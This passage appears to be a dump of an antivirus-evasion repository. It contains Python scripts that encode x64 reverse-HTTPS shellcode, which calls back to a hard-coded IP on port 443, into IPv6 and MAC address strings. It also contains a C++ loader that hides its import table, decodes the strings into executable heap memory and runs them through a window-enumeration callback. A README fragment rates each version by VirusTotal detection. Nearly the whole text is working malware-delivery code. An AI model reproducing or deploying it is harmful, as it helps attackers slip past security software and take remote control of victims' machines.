\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\xee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 4 | 5 | def convertToIPV6(shellcode): 6 | if len(shellcode)%16 !=0: 7 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 8 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 9 | shellcode += addNullbyte 10 | 11 | ipv6 = [] 12 | for i in range(0, len(shellcode), 16): 13 | 
ipv6.append(str(ipaddress.IPv6Address(shellcode[i:i+16]))) 14 | return ipv6 15 | # \x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff => 4831:c948:81e9:c0ff:ffff:488d:5ef:ffff\x00 16 | 17 | 18 | if __name__ == '__main__': 19 | r = convertToIPV6(buf) 20 | print(str(r).replace("'","\"")) 21 | -------------------------------------------------------------------------------- /callback/v0.3/trans.py: -------------------------------------------------------------------------------- 1 | import ipaddress 2 | 3 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e
\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x6c\x7a\x36\x41\x00\xf7\x60\x59\x6d\x9c\x78\x07\x14\x7f\x90\x3c\xb5\xf2\xd1\x99\x9d\x91\xc2\x66\xc4\x6e\x17\x3f\xb8\x43\xb3\xee\x45\x28\xef\x8f\xce\x7b\x5b\x06\x91\x2c\x2e\xa4\x2a\xe7\x68\xde\xb9\xf2\x82\xde\xae\x9e\x91\xe7\xf5\x30\x38\x9f\x6b\xe4\x40\x5a\x07\xbc\xcf\x15\x91\x99\xe0\x5f\x94\x3e\x00\xa5\x0f\xfd\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x41\x52\x4a\x53\x29\x0d\x0a\x00\x71\xe4\xfb\xc4\x3a\xc6\x6a\x35\x0e\x94\xd6\xd4\x36\x78\xf7\x49\x9d\x55\x26\x95\xac\x46\xfb\x05\x6a\xf6\x58\x5c\x9f\x31\x8b\xee\x43\x2e\xf9\xf0\x8c\x6a\x48\x6a\xf0\xe8\x89\x88\x15\x32\x17\x6b\xe5\x58\x01\xb7\x6c\xb0\x96\xc4\x7f\x49\x51\x34\x28\x5e\xb9\x98\x7c\x4d\xba\x1c\xe2\x35\x45\x25\x71\xda\x4b\x1f\x7f\x67\xb7\x7d\x9e\xb0\xa8\x7f\x0b\xed\x8a\x5c\x12\xa9\x62\x5a\x09\x81\xb7\xb9\x10\xb3\x8b\xdd\x98\xe9\x6f\x62\x1e\xa9\x89\x2f\xfa\x9f\x26\x66\x16\xb1\x3b\xd0\xb0\xc3\x32\xb1\xe0\x0d\xf9\xa3\x41\x00\x23\xd0\x71\x71\xc0\x1a\x73\xf1\x40\x04\x3b\xae\x57\x16\x7c\x42\x0c\x48\x31\x97\x60\x7a\xac\x60\xc5\xc7\x85\x62\xba\xbc\xef\xfe\x62\xa4\x7d\x0e\x79\x75\x4b\x47\xb8\x6d\x42\x48\xdf\x4a\x33\x64\xd0\x86\x3b\x29\xb1\x9b\xde\xdc\x9a\xb6\xcc\x1c\x36\xde\x51\x0c\x4f\xa4\x83\x85\x85\xaf\x7d\x23\x1c\x56\xdb\x86\xbe\x91\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9
\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' # shellcode 4 | 5 | 6 | def convertToIPV6(shellcode): 7 | if len(shellcode)%16 !=0: 8 | print("\n[*] length:",len(shellcode)+(16-(len(shellcode)%16))) 9 | addNullbyte = b"\x00" * (16-(len(shellcode)%16)) 10 | shellcode += addNullbyte 11 | 12 | ipv6 = [] 13 | for i in range(0, len(shellcode), 16): 14 | ipv6.append(str(ipaddress.IPv6Address(shellcode[i:i+16]))) 15 | return ipv6 16 | # \x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff => 4831:c948:81e9:c0ff:ffff:488d:5ef:ffff\x00 17 | 18 | 19 | if __name__ == '__main__': 20 | r = convertToIPV6(buf) 21 | print(str(r).replace("'","\"")) 22 | -------------------------------------------------------------------------------- /callback/v0.4/trans.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | def convertToMAC(shellcode): 4 | if len(shellcode) % 6 != 0: 5 | print("\n[*] length:", len(shellcode) + (6 - (len(shellcode) % 6))) 6 | addNullbyte = b"\x00" * (6 - (len(shellcode) % 6)) 7 | shellcode += addNullbyte 8 | 9 | mac = [] 10 | for i in range(0, len(shellcode), 6): 11 | tmp_mac = "" 12 | for j in shellcode[i:i + 6]: 13 | if len(hex(j).replace("0x", "")) == 1: 14 | tmp_mac = tmp_mac + "0" + hex(j).replace("0x", "").upper() + "-" 15 | else: 16 | tmp_mac = tmp_mac + hex(j).replace("0x", "").upper() + "-" 17 | mac.append(tmp_mac[:-1]) 18 | return mac 19 | 20 | 21 | 22 | if __name__ == '__main__': 23 | buf = 
b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x63\x38\x4c\x76\x00\xcf\x83\xc4\xc5\xe2\x7b\xbc\xfa\x0b\x48\xad\x2d\x24\x9c\x96\xd2\xf6\xe3\x59\x00\x16\xac\xd4\x03\x90\x9c\x84\x68\x08\x57\x3d\x55\xf7\x95\x27\xcf\x2c\xab\x24\xab\xda\x4e\xa3\xcc\x7e\xcc\xe9\xa8\xf3\x43\x24\x8c\x90\xfa\x5f\x79\x0a\x32\x09\x38\xb2\x0d\x66\x27\xe5\x54\xb4\xa4
\xcd\x9a\x2d\x7c\x78\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x14\x0c\x23\x96\x4b\x6e\xa9\xc4\x84\xb0\x7f\x9d\x6d\xcc\x6e\xfb\x89\x44\x9c\x96\x36\x25\x28\xbe\x62\xe5\x4f\x5f\x56\xf0\x93\x01\x73\x0c\xf7\xce\x6a\x5b\x86\x97\xdd\xaa\xb3\x02\x9f\xdc\xc5\x18\x6e\x7d\x0b\x90\x8f\xd5\xb7\x11\xbc\x73\x40\x9e\x76\x15\x95\xfe\xf1\x2c\x97\xc5\x03\xad\xd7\xb2\x62\xfe\xe4\xea\xa8\x56\xbf\xe1\xe3\x7d\x7d\x70\xa4\xc5\x2c\x07\x67\xbf\x29\x4b\x0a\x6a\x06\xfc\x41\x0d\x68\x33\x1b\x46\x5a\x12\x14\x0b\x19\xb8\x02\xc8\xf1\x1e\xe7\xe4\x9e\x99\x87\x98\x81\xc8\xc8\x28\x88\x99\xa8\x5d\x3f\xe9\x31\x16\x37\xb6\x70\x8c\x0f\x65\x98\x06\x09\xd8\xf7\xcf\x40\xb8\x25\xa6\x03\x8e\xa4\x4b\x94\x16\x70\x77\xf4\xa0\x3b\xd9\x3d\x46\xb1\x1d\xc0\xa2\x20\x7f\xca\xa4\xc8\x7d\x2d\x43\x76\xe7\x5c\x9f\xfb\x6e\xb2\x60\x71\x2f\x58\xd9\x7a\xbb\xb2\xee\xb0\x2f\x52\x6d\x6f\xcd\x4d\x6c\x6f\x5a\x22\xf2\xf8\xdf\xeb\x7a\xa7\x3e\x37\x3b\x52\xde\x73\x6b\x6f\x1f\x97\x31\x49\xd4\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 24 | u = convertToMAC(buf) 25 | print(str(u).replace("'","\"")) 26 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.4/trans.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | def 
convertToMAC(shellcode): 4 | if len(shellcode) % 6 != 0: 5 | print("\n[*] length:", len(shellcode) + (6 - (len(shellcode) % 6))) 6 | addNullbyte = b"\x00" * (6 - (len(shellcode) % 6)) 7 | shellcode += addNullbyte 8 | 9 | mac = [] 10 | for i in range(0, len(shellcode), 6): 11 | tmp_mac = "" 12 | for j in shellcode[i:i + 6]: 13 | if len(hex(j).replace("0x", "")) == 1: 14 | tmp_mac = tmp_mac + "0" + hex(j).replace("0x", "").upper() + "-" 15 | else: 16 | tmp_mac = tmp_mac + hex(j).replace("0x", "").upper() + "-" 17 | mac.append(tmp_mac[:-1]) 18 | return mac 19 | 20 | 21 | 22 | if __name__ == '__main__': 23 | buf = b'''\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xbb\x01\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x
00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x4c\x70\x58\x49\x00\xdf\xe6\x55\x0b\xc7\x0b\x19\x4d\xb4\x74\x8f\x06\x89\x8a\x62\x17\x8f\xc2\x8a\xc8\x21\xa0\x1b\x2e\x3f\xf9\xcf\x4b\x32\x72\xe2\xe9\x74\x2d\x6c\x32\xf5\xd2\x0e\xca\xb1\x8a\x0a\xc6\xf2\xf8\xec\xe0\x5c\x80\x5e\x86\x62\x24\x8d\x0a\x10\x51\xd6\xda\xaf\x84\xce\x8a\x8a\xa7\xfa\x78\x18\x97\xbc\xb0\x50\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x47\x57\x4a\x53\x29\x0d\x0a\x00\xce\x75\x8d\xfb\x7d\xdb\xd6\x05\x1b\xcb\xc5\x45\xfa\x7e\x21\x5f\xe5\xc3\x0b\x88\xf3\x22\xf4\x2b\xf7\x55\xfa\x5c\x6e\xbd\xde\x31\x99\xbb\xef\x1a\x1e\xee\xb9\x3a\xb1\x56\xbc\xb1\x46\x56\x80\xb3\xf1\x7b\x88\x93\xa2\x76\x7a\x59\x95\x4a\x67\x06\x2d\xcb\x36\xb2\x51\x85\x83\xb8\xfc\x59\x57\xe8\x5b\x21\x57\xa2\x1f\xc0\x5f\x03\x10\xe1\x85\x04\xb0\x60\xe6\xe7\xa7\x98\x52\x32\x40\x44\x47\xdb\x61\xb7\x11\x42\x5a\xf2\x20\x06\xb7\xc6\x9a\x26\xed\x5e\x9a\xfd\x87\x9e\x73\x66\xa9\xe9\xf5\x95\xc7\x74\x63\x4d\x2d\xab\x13\x00\xf5\xe6\x80\x00\xf4\x69\xc8\x55\xde\xe6\x9d\x77\x2c\xb7\x1c\xaf\x22\xe9\xa7\xfc\x1c\x37\xe7\xe9\xd6\xd1\x8e\xfe\x30\xae\x21\x9f\xdd\xe9\xdc\x62\xbc\xfd\xf2\x68\x93\xee\x61\x4c\xe1\x39\x0e\x0c\xc6\x37\xa3\xe3\xa4\x27\xb1\x72\xec\xb0\xf3\xfb\x9c\x79\x79\xf5\x60\x77\x73\xcd\xc5\x73\x61\x01\x09\xb5\xc3\x75\x70\xa9\xb1\x4e\xa2\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\x
d5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x2e\x31\x35\x2e\x38\x30\x2e\x31\x30\x32\x00\x49\x96\x02\xd2''' 24 | u = convertToMAC(buf) 25 | print(str(u).replace("'","\"")) 26 | -------------------------------------------------------------------------------- /hide_Import_tables/v0.3/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #pragma comment(lib, "Ntdll.lib") 5 | 6 | 7 | const char* ipv6[] = 8 | { 9 | "fc48:83e4:f0e8:c800:0:4151:4150:5251", "5648:31d2:6548:8b52:6048:8b52:1848:8b52", "2048:8b72:5048:fb7:4a4a:4d31:c948:31c0", "ac3c:617c:22c:2041:c1c9:d41:1c1:e2ed", "5241:5148:8b52:208b:423c:4801:d066:8178", "180b:275:728b:8088:0:48:85c0:7467", "4801:d050:8b48:1844:8b40:2049:1d0:e356", "48ff:c941:8b34:8848:1d6:4d31:c948:31c0", "ac41:c1c9:d41:1c1:38e0:75f1:4c03:4c24", "845:39d1:75d8:5844:8b40:2449:1d0:6641", "8b0c:4844:8b40:1c49:1d0:418b:488:4801", "d041:5841:585e:595a:4158:4159:415a:4883", "ec20:4152:ffe0:5841:595a:488b:12e9:4fff", "ffff:5d6a:49:be77:696e:696e:6574:41", "5649:89e6:4c89:f141:ba4c:7726:7ff:d548", "31c9:4831:d24d:31c0:4d31:c941:5041:5041", "ba3a:5679:a7ff:d5e9:9300:0:5a48:89c1", "41b8:bb01:0:4d31:c941:5141:516a:341", "5141:ba57:899f:c6ff:d5eb:795b:4889:c148", "31d2:4989:d84d:31c9:5268:32:c084:5252", "41ba:eb55:2e3b:ffd5:4889:c648:83c3:506a", "a5f:4889:f1ba:1f00:0:6a00:6880:3300", "49:89e0:41b9:400:0:41ba:7546:9e86", "ffd5:4889:f148:89da:49c7:c0ff:ffff:ff4d", "31c9:5252:41ba:2d06:187b:ffd5:85c0:f85", "9d01:0:48ff:cf0f:848c:100:eb:b3e9", "e401:0:e882:ffff:ff2f:4c70:5849:df", "e655:bc7:b19:4db4:748f:689:8a62:178f", "c28a:c821:a01b:2e3f:f9cf:4b32:72e2:e974", "2d6c:32f5:d20e:cab1:8a0a:c6f2:f8ec:e05c", "805e:8662:248d:a10:51d6:daaf:84ce:8a8a", 
"a7fa:7818:97bc:b050:55:7365:722d:4167", "656e:743a:204d:6f7a:696c:6c61:2f35:2e30", "2028:636f:6d70:6174:6962:6c65:3b20:4d53", "4945:2031:302e:303b:2057:696e:646f:7773", "204e:5420:362e:323b:2057:4f57:3634:3b20", "5472:6964:656e:742f:362e:303b:204d:4147", "574a:5329:d0a:ce:758d:fb7d:dbd6:51b", "cbc5:45fa:7e21:5fe5:c30b:88f3:22f4:2bf7", "55fa:5c6e:bdde:3199:bbef:1a1e:eeb9:3ab1", "56bc:b146:5680:b3f1:7b88:93a2:767a:5995", "4a67:62d:cb36:b251:8583:b8fc:5957:e85b", "2157:a21f:c05f:310:e185:4b0:60e6:e7a7", "9852:3240:4447:db61:b711:425a:f220:6b7", "c69a:26ed:5e9a:fd87:9e73:66a9:e9f5:95c7", "7463:4d2d:ab13:f5:e680:f4:69c8:55de", "e69d:772c:b71c:af22:e9a7:fc1c:37e7:e9d6", "d18e:fe30:ae21:9fdd:e9dc:62bc:fdf2:6893", "ee61:4ce1:390e:cc6:37a3:e3a4:27b1:72ec", "b0f3:fb9c:7979:f560:7773:cdc5:7361:109", "b5c3:7570:a9b1:4ea2:41:bef0:b5a2:56ff", "d548:31c9:ba00:40:41:b800:1000:41", "b940:0:41:ba58:a453:e5ff:d548:9353", "5348:89e7:4889:f148:89da:41b8:20:0", "4989:f941:ba12:9689:e2ff:d548:83c4:2085", "c074:b666:8b07:4801:c385:c075:d758:5858", "4805::50c3:e87f:fdff:ff31:2e31", "352e:3830:2e31:3032:49:9602:d200:0" 10 | }; 11 | 12 | typedef HANDLE(WINAPI* ImportHeapCreate)( 13 | _In_ DWORD flOptions, 14 | _In_ SIZE_T dwInitialSize, 15 | _In_ SIZE_T dwMaximumSize 16 | ); 17 | 18 | typedef LPVOID(WINAPI* ImportHeapAlloc)( 19 | _In_ HANDLE hHeap, 20 | _In_ DWORD dwFlags, 21 | _In_ SIZE_T dwBytes 22 | ); 23 | 24 | typedef NTSTATUS(NTAPI* ImportRtlIpv6StringToAddressA)( 25 | _In_ PCSTR S, 26 | _Out_ PCSTR* Terminator, 27 | _Out_ struct in6_addr* Addr 28 | ); 29 | 30 | typedef BOOL(WINAPI* ImportEnumChildWindows)( 31 | _In_opt_ HWND hWndParent, 32 | _In_ WNDENUMPROC lpEnumFunc, 33 | _In_ LPARAM lParam 34 | ); 35 | 36 | 37 | 38 | 39 | int main() 40 | { 41 | ImportHeapCreate MyHeapCreate = (ImportHeapCreate)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapCreate"); 42 | ImportHeapAlloc MyHeapAlloc = (ImportHeapAlloc)GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "HeapAlloc"); 
43 | 44 | HMODULE hModule = LoadLibraryA("ntdll.dll"); 45 | ImportRtlIpv6StringToAddressA MyRtlIpv6StringToAddressA = (ImportRtlIpv6StringToAddressA)GetProcAddress(hModule, "RtlIpv6StringToAddressA"); 46 | 47 | HMODULE hModule2 = LoadLibraryA("USER32.dll"); 48 | ImportEnumChildWindows MyEnumChildWindows = (ImportEnumChildWindows)GetProcAddress(hModule2, "EnumChildWindows"); 49 | 50 | 51 | HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 52 | void* ha = HeapAlloc(hc, 0, 0x100000); 53 | DWORD_PTR hptr = (DWORD_PTR)ha; 54 | int elems = sizeof(ipv6) / sizeof(ipv6[0]); 55 | PCSTR Terminator = ""; 56 | 57 | for (int i = 0; i < elems; i++) { 58 | 59 | if (MyRtlIpv6StringToAddressA(ipv6[i], &Terminator, (in6_addr*)hptr) == STATUS_INVALID_PARAMETER) 60 | { 61 | printf("ERROR!"); 62 | return 0; 63 | } 64 | hptr += 16; 65 | } 66 | 67 | MyEnumChildWindows(NULL, (WNDENUMPROC)ha, 0); 68 | CloseHandle(ha); 69 | return 0; 70 | } 71 | -------------------------------------------------------------------------------- /callback/README.md: -------------------------------------------------------------------------------- 1 | # 免杀方式:回调函数 2 | 3 | 4 | 5 | ## 编译环境: 6 | 7 | VS2022、Windows SDK 10.0、C++14 8 | 9 | 10 | 11 | ## 目录 12 | 13 | | 版本号 | 写入内存方式 | VT查杀率 | 